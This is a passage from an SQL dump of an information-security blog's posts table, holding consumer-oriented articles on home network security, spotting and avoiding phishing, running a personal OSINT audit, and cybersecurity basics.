It protects your own device’s traffic when you are away from home on public Wi-Fi; it does not harden the home network itself.</li>\r\n 	<li><strong>Enable MAC Address Filtering</strong>: MAC address filtering allows you to specify which devices can connect to your network based on their unique MAC addresses. Be aware that this is a weak control: MAC addresses are sent unencrypted over the air and can be read and spoofed by anyone nearby, so it stops only casual connections. It also requires manual configuration and may not be user-friendly for all households.</li>\r\n 	<li><strong>Segment Your Network</strong>: If you have many devices with varying security levels, consider creating separate network segments. For example, you can have one network for work-related devices and another for IoT devices. This limits the potential impact of a compromised device, provided the segments cannot talk to each other; check that the router actually blocks traffic between them (often called client or AP isolation) rather than just giving them different names.</li>\r\n</ul>\r\nSecuring your home network is not just about protecting your personal information—it’s about safeguarding your entire digital ecosystem. By following the steps outlined in this guide, you can significantly enhance the security of your home network and protect against the growing number of cyber threats. Regularly review and update your security measures to stay ahead of potential vulnerabilities, ensuring your home remains a safe and secure digital environment.', '', NULL, NULL, 1, 'draft', '2024-08-10 02:25:57', '2026-01-12 21:41:44', 'Information Security', 'How to Secure Your Home Network', '', NULL),
(111, 'Understanding Phishing Attacks and How to Avoid Them', 'understanding-phishing-attacks-and-how-to-avoid-them', 'In the ever-evolving landscape of cybersecurity threats, phishing attacks remain one of the most prevalent and dangerous. These attacks exploit human psychology and the trust users place in legitimate-looking emails or websites. To protect yourself and your data, it\'s crucial to understand how phishing works and how to avoid falling victim to these deceptive tactics.\r\n<h3>What is Phishing?</h3>\r\nPhishing is a type of cyber attack where attackers impersonate legitimate entities to deceive individuals into providing sensitive information, such as usernames, passwords, credit card numbers, or other personal details. These attacks typically occur through emails, text messages, or fake websites that appear trustworthy.\r\n<h3>Common Types of Phishing Attacks</h3>\r\n<ol>\r\n 	<li><strong>Email Phishing</strong>: This is the most common form of phishing. Attackers send emails that appear to come from reputable sources, such as banks, online services, or colleagues. These emails often contain urgent messages or threats to prompt immediate action, leading recipients to click on malicious links or download harmful attachments.</li>\r\n 	<li><strong>Spear Phishing</strong>: Unlike broad email phishing campaigns, spear phishing targets specific individuals or organizations. Attackers gather information about their targets to craft personalized messages, increasing the likelihood of success.</li>\r\n 	<li><strong>Whaling</strong>: A subset of spear phishing, whaling targets high-profile individuals within an organization, such as executives or managers. These attacks are highly sophisticated and aim to steal sensitive corporate data or funds.</li>\r\n 	<li><strong>Smishing and Vishing</strong>: These attacks use SMS (smishing) or voice calls (vishing) to trick victims into revealing personal information. 
Attackers may pose as banks, government agencies, or tech support.</li>\r\n</ol>\r\n<h3><img class=\"wp-image-3353 alignleft\" style=\"font-size: 16px\" src=\"https://infoseclabs.io/wp-content/uploads/2024/08/phishingEmailSample-300x215.png\" alt=\"\" width=\"543\" height=\"389\" />How to Recognize Phishing Attempts</h3>\r\n<ol>\r\n 	<li><strong>Check the Sender\'s Email Address</strong>: Phishing emails often come from addresses that look similar to legitimate ones but have slight variations or misspellings. Always verify the sender\'s email address before taking any action. Remember that the display name is chosen freely by the sender and the From address itself can be forged, so a correct-looking address is not proof that a message is genuine.</li>\r\n 	<li><strong>Look for Suspicious Links</strong>: Hover over links in emails to see the actual URL. If the link looks suspicious or doesn\'t match the sender\'s domain, do not click on it. Be especially careful with shortened links and with links that merely contain a brand name somewhere in the URL; what matters is the domain the browser will actually connect to.</li>\r\n 	<li><strong>Beware of Urgency and Threats</strong>: Phishing emails often create a sense of urgency or fear to prompt immediate action. Be cautious of emails that pressure you to act quickly.</li>\r\n 	<li><strong>Check for Grammatical Errors</strong>: Many phishing emails contain spelling and grammatical mistakes. While not always present, errors can be a red flag. Attackers increasingly send polished, error-free messages, so clean grammar is not evidence that a message is legitimate.</li>\r\n 	<li><strong>Verify Requests for Personal Information</strong>: Legitimate organizations rarely ask for sensitive information via email. If you receive such a request, verify its authenticity through official channels, using a phone number or website you already know rather than contact details supplied in the message itself.</li>\r\n</ol>\r\n<h3>How to Protect Yourself from Phishing</h3>\r\n<ol>\r\n 	<li><strong>Use Multi-Factor Authentication (MFA)</strong>: MFA adds an extra layer of security by requiring two or more verification methods to access your accounts. 
Even if your password is compromised, MFA makes unauthorized access much harder. Note that SMS codes and app-generated one-time codes can still be captured by a phishing page that relays them to the real site in real time; where offered, prefer phishing-resistant methods such as hardware security keys or passkeys (FIDO2/WebAuthn), which only work with the genuine website. If you realize you have entered a password on a suspicious page, change it immediately on the real site.</li>\r\n 	<li><strong>Keep Software Updated</strong>: Regularly update your operating system, browser, and applications to protect against known vulnerabilities that attackers may exploit.</li>\r\n 	<li><strong>Educate Yourself and Others</strong>: Stay informed about the latest phishing tactics and share this knowledge with friends, family, and colleagues. Awareness is a key defense against phishing attacks.</li>\r\n 	<li><strong>Use Security Software</strong>: Install and maintain reputable antivirus and anti-malware software to detect and block malicious activities.</li>\r\n 	<li><strong>Report Phishing Attempts</strong>: Report suspected phishing emails to your email provider and relevant authorities. Many email services have built-in reporting features that help improve their filters. If you received the message at work, use your organization\'s reporting channel so the security team can block the campaign for everyone.</li>\r\n</ol>\r\nPhishing attacks are a significant threat in today\'s digital world, but by understanding their tactics and knowing how to recognize and avoid them, you can significantly reduce your risk. Stay vigilant, educate yourself and others, and always verify the authenticity of any unsolicited requests for personal information. By taking these precautions, you can help protect yourself and your data from falling into the hands of cybercriminals.', '', NULL, NULL, 1, 'draft', '2024-08-07 14:22:02', '2026-01-12 21:41:44', 'Information Security', 'Understanding Phishing Attacks and How to Avoid Them', '', NULL),
(112, 'How to Conduct a Personal OSINT Audit', 'how-to-conduct-a-personal-osint-audit', '<h3 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>What is OSINT?</strong></h3>\r\nOpen Source Intelligence (OSINT) involves collecting and analyzing publicly available information from various sources to produce actionable intelligence. OSINT is widely used by cybersecurity professionals, law enforcement, journalists, and even individuals to gather information for various purposes.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Why Conduct a Personal OSINT Audit?</strong></h3>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Identify Exposure:</strong> Understand what personal information is available about you online.</li>\r\n 	<li><strong>Mitigate Risks:</strong> Take steps to remove or secure sensitive information.</li>\r\n 	<li><strong>Improve Privacy:</strong> Enhance your overall online privacy and security.</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Steps to Conduct a Personal OSINT Audit</strong></h3>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>1. Define Your Objectives</strong></h4>\r\nBefore you start, clearly define what you want to achieve with your OSINT audit. Are you looking to find out what personal information is available online? Are you concerned about specific types of data, such as your home address or financial information?\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>2. Gather Your Tools</strong></h4>\r\nYou\'ll need a few tools to help you collect and analyze data. 
Here are some recommended tools:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Search Engines:</strong> Google, Bing, DuckDuckGo</li>\r\n 	<li><strong>Social Media Search Tools:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.social-searcher.com/\" target=\"_blank\" rel=\"nofollow noopener\">Social Searcher</a></li>\r\n 	<li><strong>Public Records Search:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://pipl.com/\" target=\"_blank\" rel=\"nofollow noopener\">Pipl</a>, <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.spokeo.com/\" target=\"_blank\" rel=\"nofollow noopener\">Spokeo</a></li>\r\n 	<li><strong>Email and Username Search:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://haveibeenpwned.com/\" target=\"_blank\" rel=\"nofollow noopener\">Have I Been Pwned</a>, <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.dehashed.com/\" target=\"_blank\" rel=\"nofollow noopener\">Dehashed</a></li>\r\n 	<li><strong>Reverse Image Search:</strong> Google Images, <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font 
underline-offset-1 transition-all duration-300\" href=\"https://tineye.com/\" target=\"_blank\" rel=\"nofollow noopener\">TinEye</a></li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>3. Search for Your Personal Information</strong></h4>\r\nStart by searching for your name, email addresses, phone numbers, and any other personal identifiers. Use multiple search engines to get a comprehensive view. Include old usernames and email addresses you no longer use; they are often what links your current accounts together.\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Google Dorking:</strong> Use advanced search operators to find specific types of information. For example, <code>inurl:\"profile\" \"John Doe\"</code> can help you find profiles associated with your name.</li>\r\n 	<li><strong>Social Media:</strong> Search for your profiles on platforms like Facebook, Twitter, LinkedIn, and Instagram. Check privacy settings and see what information is publicly visible.</li>\r\n 	<li><strong>Public Records:</strong> Use tools like Pipl and Spokeo to find public records associated with your name.</li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>4. Analyze the Data</strong></h4>\r\nOnce you\'ve gathered the data, analyze it to identify any sensitive information that could be a potential risk. Look for:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Personally Identifiable Information (PII):</strong> Name, address, phone number, email, social security number.</li>\r\n 	<li><strong>Financial Information:</strong> Bank details, credit card numbers.</li>\r\n 	<li><strong>Professional Information:</strong> Job history, professional affiliations.</li>\r\n 	<li><strong>Social Media Activity:</strong> Posts, photos, connections.</li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>5. Take Action</strong></h4>\r\nBased on your findings, take steps to secure your information:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Remove or Update Information:</strong> Contact websites to remove outdated or sensitive information. People-search and data-broker sites usually offer an opt-out or removal request process; use it, and expect to repeat it periodically, since records tend to reappear. 
Update privacy settings on social media accounts.</li>\r\n 	<li><strong>Use Strong Passwords:</strong> Ensure all your accounts use strong, unique passwords. Consider using a password manager.</li>\r\n 	<li><strong>Enable Two-Factor Authentication:</strong> Add an extra layer of security to your accounts by enabling two-factor authentication.</li>\r\n 	<li><strong>Monitor Your Online Presence:</strong> Set up Google Alerts for your name and other personal identifiers to stay informed about new information that appears online.</li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>6. Document Your Findings</strong></h4>\r\nKeep a record of your findings and the actions you\'ve taken. This can help you track your progress and identify any recurring issues.\r\n\r\nConducting a personal OSINT audit is an essential step in protecting your privacy and security online. By understanding what information is publicly available about you and taking steps to secure it, you can significantly reduce your risk of being targeted by cybercriminals or having your personal information misused. 
Regularly conducting OSINT audits can help you stay on top of your online presence and maintain your privacy in the digital world.\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Useful Resources</strong></h4>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>OSINT Framework:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://osintframework.com/\" target=\"_blank\" rel=\"nofollow noopener\">osintframework.com</a></li>\r\n 	<li><strong>Have I Been Pwned:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://haveibeenpwned.com/\" target=\"_blank\" rel=\"nofollow noopener\">haveibeenpwned.com</a></li>\r\n 	<li><strong>Social Searcher:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.social-searcher.com/\" target=\"_blank\" rel=\"nofollow noopener\">social-searcher.com</a></li>\r\n 	<li><strong>Pipl:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://pipl.com/\" target=\"_blank\" rel=\"nofollow noopener\">pipl.com</a></li>\r\n 	<li><strong>Dehashed:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.dehashed.com/\" target=\"_blank\" rel=\"nofollow noopener\">dehashed.com</a></li>\r\n 	
<li><strong>TinEye:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tineye.com/\" target=\"_blank\" rel=\"nofollow noopener\">tineye.com</a></li>\r\n</ul>\r\nBy following these steps and utilizing the recommended tools, you can effectively conduct a personal OSINT audit and take control of your online presence.', '', NULL, NULL, 1, 'draft', '2024-08-06 22:02:32', '2026-01-12 21:41:44', 'Information Security', 'How to Conduct a Personal OSINT Audit', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(113, 'The Basics of Cybersecurity: A Beginner\'s Guide', 'the-basics-of-cybersecurity-a-beginners-guide', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity has become more crucial than ever as our lives increasingly revolve around digital technology. Whether you\'re managing a small business, keeping up with email communication, or simply browsing the web, understanding <b><strong class=\"font-bold\">cybersecurity basics</strong></b> can help protect sensitive data and avoid costly breaches. This guide will explain the fundamentals of cybersecurity, its importance, and how you can start improving your online safety with practical tips and techniques.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity refers to the practice of protecting systems, networks, and data from unauthorized access, theft, or damage. It involves a range of tools, processes, and strategies designed to safeguard against digital attacks. Some common forms of threats include malware, ransomware, phishing scams, and denial-of-service (DoS) attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By taking proactive steps to secure your online presence, you can prevent these attacks from causing data breaches, financial harm, or disruptions to your operations.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Cybersecurity Important?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyberattacks can affect anyone—from large corporations to individual users. 
Here\'s why focusing on <b><strong class=\"font-bold\">the importance of cybersecurity</strong></b> is essential:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Safeguards Sensitive Data</strong></b>: Protect personal, financial, and business information from being accessed by unauthorized users.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Prevents Financial Loss</strong></b>: Avoid the high costs of data breaches, which may include fines, legal fees, and loss of trust from customers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Protects Privacy</strong></b>: Ensures that your personal and professional communications remain confidential.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Builds Trust</strong></b>: Establish credibility with clients and stakeholders by demonstrating your commitment to security.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Concepts in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To build a solid foundation in cybersecurity, here are some essential concepts to know:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] 
[&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. The CIA Triad (Confidentiality, Integrity, Availability)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The CIA Triad is the core model of information security:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Confidentiality</strong></b>: Only authorized individuals can access sensitive information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Integrity</strong></b>: Ensures the accuracy and reliability of data by protecting it from unauthorized alteration.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Availability</strong></b>: Makes sure authorized users can access information and systems whenever needed.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Types of Cyber Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber threats come in many forms. 
Understanding these will help you recognize and defend against them:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Malware</strong></b>: Malicious software such as viruses, worms, and Trojans designed to damage or disrupt devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Phishing</strong></b>: Fraudulent emails or messages that trick users into sharing sensitive information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Ransomware</strong></b>: Programs that lock users out of their data until a ransom is paid.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Man-in-the-Middle (MitM) Attacks</strong></b>: Cybercriminals intercept and alter communications between two parties.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Denial-of-Service (DoS) Attacks</strong></b>: Overload a website or network with traffic to prevent normal operations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Cybersecurity Tools and Practices</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Several tools and techniques can fortify your online security:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Firewalls</strong></b>: Controls network traffic to block unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Antivirus Software</strong></b>: Detects and removes malicious programs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Encryption</strong></b>: Protects data by converting it into indecipherable code.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Multi-Factor Authentication (MFA)</strong></b>: Adds extra verification steps to secure accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Regular Updates</strong></b>: Keeps software patched to defend against vulnerabilities.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Tips and Best Practices</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to secure your digital presence? 
Follow these <b><strong class=\"font-bold\">cybersecurity best practices</strong></b> to reduce risks and build a safe online environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Develop Strong Cyber Hygiene</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use strong, unique passwords for each account and store them securely with a password manager.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable <b><strong class=\"font-bold\">two-factor authentication</strong></b> wherever possible for enhanced account security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update your software to ensure you’re protected against the latest threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Be cautious when clicking on links or downloading attachments in emails. Avoid falling victim to <b><strong class=\"font-bold\">preventing email scams</strong></b> by verifying the sender.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Explore Cybersecurity Tools</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Protect your devices with reliable antivirus software.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Set up a firewall to monitor network activity for suspicious behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Encrypt sensitive data, especially when transmitting it over public networks.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Identify and Avoid Phishing Scams</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing scams can be difficult to spot, but here’s how to protect yourself:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Look for suspicious email addresses or domains.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid clicking on unsolicited links or opening unexpected attachments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Report potential phishing messages to IT or email providers.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] 
pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Stay Vigilant with Open Source Intelligence (OSINT)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Harness <b><strong class=\"font-bold\">OSINT techniques</strong></b> to gather publicly available information to secure your systems. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use search engines like Google to monitor potential data breaches involving your personal or business information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Stay updated on the latest cybersecurity trends using trusted sources like blogs and forums.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Beginner’s Roadmap to Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Starting your cybersecurity learning journey can feel overwhelming. But with the right steps, you can build your knowledge quickly and effectively. 
